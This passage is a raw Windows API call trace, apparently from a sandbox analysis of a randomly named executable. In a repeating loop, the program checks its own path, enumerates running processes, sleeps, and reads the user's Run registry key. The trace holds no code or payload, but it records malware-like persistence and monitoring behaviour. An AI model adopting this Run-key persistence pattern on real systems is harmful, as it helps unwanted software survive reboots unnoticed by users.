Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.790] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700088) returned 1 [0171.790] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.790] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.790] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7009e8) returned 1 [0171.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.809] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.810] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.810] NtClose (Handle=0x270) returned 0x0 [0171.810] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.810] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.810] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700808) returned 1 [0171.810] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.810] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.810] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700790) returned 1 [0171.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.831] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.832] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.832] NtClose (Handle=0x270) returned 0x0 [0171.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.832] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.832] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700448) returned 1 [0171.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.833] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.833] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700790) returned 1 [0171.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.856] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.861] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.862] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.862] NtClose (Handle=0x270) returned 0x0 [0171.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.862] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.862] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7009e8) returned 1 [0171.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.862] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.862] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7004c0) returned 1 [0171.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.878] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.879] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.879] NtClose (Handle=0x270) returned 0x0 [0171.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.879] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.880] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0171.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.880] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.880] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffea8) returned 1 [0171.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.898] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.900] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.900] NtClose (Handle=0x270) returned 0x0 [0171.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.900] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700b50) returned 1 [0171.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.900] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffe30) returned 1 [0171.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.916] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.917] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.917] NtClose (Handle=0x270) returned 0x0 [0171.917] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.917] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.917] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.917] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.917] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.917] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700628) returned 1 [0171.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 